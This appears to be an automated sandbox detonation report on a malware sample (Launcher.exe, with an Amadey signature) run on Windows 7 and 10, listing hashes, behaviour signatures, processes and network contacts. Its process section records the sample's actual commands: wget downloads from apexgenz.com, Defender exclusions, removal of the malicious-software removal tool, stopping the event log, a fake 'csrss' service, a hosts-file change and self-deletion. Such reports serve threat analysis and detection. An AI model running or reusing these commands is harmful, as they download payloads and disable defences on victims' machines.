memory/1132-22-0x0000000000E10000-0x0000000000E20000-memory.dmp
memory/1132-25-0x0000000005960000-0x0000000005982000-memory.dmp
memory/1132-26-0x0000000005A00000-0x0000000005A66000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_phlul210.5ol.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1132-29-0x0000000005A70000-0x0000000005AD6000-memory.dmp
memory/1132-37-0x0000000005C60000-0x0000000005FB4000-memory.dmp
memory/1132-38-0x00000000060B0000-0x00000000060CE000-memory.dmp
memory/1132-39-0x00000000060F0000-0x000000000613C000-memory.dmp
memory/1132-40-0x0000000007060000-0x00000000070F6000-memory.dmp
memory/1132-41-0x00000000065E0000-0x00000000065FA000-memory.dmp
memory/1132-42-0x0000000006630000-0x0000000006652000-memory.dmp
memory/1132-43-0x0000000007920000-0x0000000007EC4000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
| MD5 | fea10d11d84919cb9a0a0752d61c0a66 |
| SHA1 | aea3c65e2b62851b2dd112597f28379b49c58a0a |
| SHA256 | 2786febdd57874118eaf5e257382cf4467d43f9ca189ac48ff6d45494f1cbab7 |
| SHA512 | e382f79ec1f1c370cd0053cccc7a0db8f3dc28b22f9dacd5f425c60adfb21e4a6eed3e119a7f9bbf135839e22d46511ca793cf8b5118d0e6256ebbbe749fc508 |
C:\Users\Admin\AppData\Roaming\services\data\Launcher.dll
| MD5 | f58866e5a48d89c883f3932c279004db |
| SHA1 | e72182e9ee4738577b01359f5acbfbbe8daa2b7f |
| SHA256 | d6f3e13dfff0a116190504efbfcbcd68f5d2183e6f89fd4c860360fba0ec8c12 |
| SHA512 | 7e76555e62281d355c2346177f60bfe2dc433145037a34cfc2f5848509401768b4db3a9fd2f6e1a1d69c5341db6a0b956abf4d975f28ee4262f1443b192fe177 |
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe.manifest
| MD5 | 1b6de83d3f1ccabf195a98a2972c366a |
| SHA1 | 09f03658306c4078b75fa648d763df9cddd62f23 |
| SHA256 | e20486518d09caf6778ed0d60aab51bb3c8b1a498fd4ede3c238ee1823676724 |
| SHA512 | e171a7f2431cfe0d3dfbd73e6ea0fc9bd3e5efefc1fbdeff517f74b9d78679913c4a60c57dde75e4a605c288bc2b87b9bb54b0532e67758dfb4a2ac8aea440ce |
memory/2132-48-0x0000000073B10000-0x00000000742C0000-memory.dmp
memory/2132-49-0x0000000004A90000-0x0000000004AA0000-memory.dmp
memory/2132-50-0x0000000004A90000-0x0000000004AA0000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\wget.exe
| MD5 | 8c04808e4ba12cb793cf661fbbf6c2a0 |
| SHA1 | bdfdb50c5f251628c332042f85e8dd8cf5f650e3 |
| SHA256 | a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272 |
| SHA512 | 9619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f |
memory/2132-62-0x000000007FAE0000-0x000000007FAF0000-memory.dmp
memory/2132-63-0x0000000006EC0000-0x0000000006EF2000-memory.dmp
memory/2132-75-0x0000000006260000-0x000000000627E000-memory.dmp
memory/2132-72-0x0000000004A90000-0x0000000004AA0000-memory.dmp
memory/2132-64-0x0000000070450000-0x000000007049C000-memory.dmp
memory/2132-76-0x0000000006F00000-0x0000000006FA3000-memory.dmp
memory/2132-77-0x0000000007650000-0x0000000007CCA000-memory.dmp
memory/2132-78-0x0000000007080000-0x000000000708A000-memory.dmp
memory/2132-79-0x0000000007210000-0x0000000007221000-memory.dmp
memory/2132-80-0x0000000007240000-0x000000000724E000-memory.dmp
memory/2132-81-0x0000000007250000-0x0000000007264000-memory.dmp
memory/2132-82-0x0000000007290000-0x00000000072AA000-memory.dmp
memory/2132-83-0x0000000007280000-0x0000000007288000-memory.dmp
memory/2132-86-0x0000000073B10000-0x00000000742C0000-memory.dmp
memory/3904-89-0x0000000000400000-0x00000000008F2000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\winrar.exe
C:\Users\Admin\AppData\Roaming\services\WinRAR.exe
C:\Users\Admin\AppData\Roaming\services\01plugins0228.rar
C:\Users\Admin\AppData\Roaming\services\plugin0228
C:\Users\Admin\AppData\Roaming\WinRAR\version.dat
C:\Users\Admin\AppData\Roaming\services\02plugins2901.rar
C:\Users\Admin\AppData\Roaming\services\2plugin2901
C:\Users\Admin\AppData\Roaming\services\.wget-hsts
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
C:\ProgramData\SystemFiles\csrss.exe
C:\Users\Admin\AppData\Roaming\services\03plugins0228.rar
C:\Windows\system32\drivers\etc\hosts
C:\Users\Admin\AppData\Roaming\services\3plugin0228
C:\Users\Admin\AppData\Roaming\services\WGET-H~1
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Analysis: behavioral17
Detonation Overview
Submitted: 2024-02-29 02:14
Reported: 2024-02-29 02:54
Platform: win7-20240221-en
Max time kernel: 1791s
Max time network: 1820s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.dll,#1
Network
Files
Analysis: behavioral18
Detonation Overview
Submitted: 2024-02-29 02:14
Reported: 2024-02-29 02:55
Platform: win10v2004-20240226-en
Max time kernel: 1788s
Max time network: 1176s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.dll,#1
Network
Files
Analysis: behavioral28
Detonation Overview
Submitted: 2024-02-29 02:14
Reported: 2024-02-29 03:23
Platform: win10v2004-20240226-en
Max time kernel: 1698s
Max time network: 1181s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\wget.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\wget.exe"
Network
Files
Analysis: behavioral11
Detonation Overview
Submitted: 2024-02-29 02:14
Reported: 2024-02-29 02:53
Platform: win7-20240221-en
Max time kernel: 1794s
Max time network: 1819s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\Xfh5GWnGPMjT.ps1
Network
Files
Analysis: behavioral12
Detonation Overview
Submitted: 2024-02-29 02:14
Reported: 2024-02-29 02:52
Platform: win10v2004-20240226-en
Max time kernel: 1739s
Max time network: 1515s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\Xfh5GWnGPMjT.ps1
Network
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b13grvey.u5d.ps1
Analysis: behavioral13
Detonation Overview
Submitted: 2024-02-29 02:14
Reported: 2024-02-29 02:53
Platform: win7-20240221-en
Max time kernel: 1799s
Max time network: 1819s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\YwTGpGD7UtG1.ps1
Network
Files
Analysis: behavioral24
Detonation Overview
Submitted: 2024-02-29 02:14
Reported: 2024-02-29 03:23
Platform: win10v2004-20240226-en
Max time kernel: 1687s
Max time network: 1165s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.dll,#1
Network
Files
Analysis: behavioral31
Detonation Overview
Submitted: 2024-02-29 02:14
Reported: 2024-02-29 03:26
Platform: win7-20240221-en
Max time kernel: 1799s
Max time network: 1820s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2660 wrote to memory of 2580 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
| PID 2660 wrote to memory of 2580 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
| PID 2660 wrote to memory of 2580 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\BLAKEX64.dll,#1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2660 -s 84
Network
Files
Analysis: behavioral10
Detonation Overview
Submitted: 2024-02-29 02:14
Reported: 2024-02-29 02:52
Platform: win10v2004-20240226-en
Max time kernel: 1795s
Max time network: 1803s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\WtFlkRqeJ61k.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x324 0x4e4
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4836 --field-trial-handle=2260,i,3303482231723870786,2954015409682154873,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3808 --field-trial-handle=2260,i,3303482231723870786,2954015409682154873,262144 --variations-seed-version /prefetch:8
Network
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nfossle4.ll3.ps1
Analysis: behavioral3
Detonation Overview
Submitted: 2024-02-29 02:14
Reported: 2024-02-29 02:52
Platform: win7-20240221-en
Max time kernel: 1787s
Max time network: 1763s
Command Line
Signatures
Amadey
Creates new service(s)
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\ProgramData\SystemFiles\csrss.exe | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\ProgramData\SystemFiles\csrss.exe | N/A |
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\conhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Windows\system32\conhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\SystemFiles\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\SystemFiles\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\SystemFiles\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\SystemFiles\csrss.exe | N/A |
Uses the VBS compiler for execution
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\SystemFiles\csrss.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\SystemFiles\csrss.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 940 set thread context of 892 | N/A | C:\Users\Admin\AppData\Roaming\services\plugin0228 | C:\Users\Admin\AppData\Roaming\services\plugin0228 |
| PID 1664 set thread context of 1880 | N/A | C:\ProgramData\SystemFiles\csrss.exe | C:\Windows\system32\conhost.exe |
| PID 1664 set thread context of 2932 | N/A | C:\ProgramData\SystemFiles\csrss.exe | C:\Windows\system32\conhost.exe |
| PID 2988 set thread context of 2080 | N/A | C:\Users\Admin\AppData\Roaming\services\3plugin0228 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\wusa.lock | C:\Windows\system32\wusa.exe | N/A |
| File created | C:\Windows\wusa.lock | C:\Windows\system32\wusa.exe | N/A |
| File created | C:\Windows\wusa.lock | C:\Windows\system32\wusa.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\Launhcer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\plugin0228 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\plugin0228 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\ProgramData\SystemFiles\csrss.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\3plugin0228 | N/A |
| N/A | N/A | C:\ProgramData\SystemFiles\csrss.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Loads dropped DLL
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Roaming\services\plugin0228 |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 00ca752cb66ada01 | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\system32\conhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
"C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
"C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/1/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\plugin0228
C:\Users\Admin\AppData\Roaming\services\plugin0228
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/2/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\plugin0228
"C:\Users\Admin\AppData\Roaming\services\plugin0228"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 892 -s 204
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\2plugin2901
C:\Users\Admin\AppData\Roaming\services\2plugin2901
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/3/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "csrss"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "csrss" binpath= "C:\ProgramData\SystemFiles\csrss.exe" start= "auto"
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "csrss"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\services\2plugin2901"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\ProgramData\SystemFiles\csrss.exe
C:\ProgramData\SystemFiles\csrss.exe
C:\Users\Admin\AppData\Roaming\services\3plugin0228
C:\Users\Admin\AppData\Roaming\services\3plugin0228
C:\Windows\system32\conhost.exe
conhost.exe
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 212
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\ProgramData\SystemFiles\csrss.exe
"C:\ProgramData\SystemFiles\csrss.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | apexgenz.com | udp |
| NL | 185.14.29.199:80 | apexgenz.com | tcp |
| US | 8.8.8.8:53 | solvadordali.com | udp |
| NL | 185.14.29.199:80 | solvadordali.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| NL | 185.14.29.199:80 | solvadordali.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| NL | 194.87.31.18:3333 | | tcp |
Files
memory/2076-0-0x0000000000160000-0x0000000000161000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab320A.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\Local\Temp\Tar321D.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 753df6889fd7410a2e9fe333da83a429 |
| SHA1 | 3c425f16e8267186061dd48ac1c77c122962456e |
| SHA256 | b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78 |
| SHA512 | 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444 |
C:\Users\Admin\AppData\Local\Temp\Tar33DC.tmp
| MD5 | dd73cead4b93366cf3465c8cd32e2796 |
| SHA1 | 74546226dfe9ceb8184651e920d1dbfb432b314e |
| SHA256 | a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22 |
| SHA512 | ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63 |
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
| MD5 | e5c00b0bc45281666afd14eef04252b2 |
| SHA1 | 3b6eecf8250e88169976a5f866d15c60ee66b758 |
| SHA256 | 542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903 |
| SHA512 | 2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387 |
C:\Users\Admin\AppData\Roaming\services\Launhcer.dll
| MD5 | 7de0541eb96ba31067b4c58d9399693b |
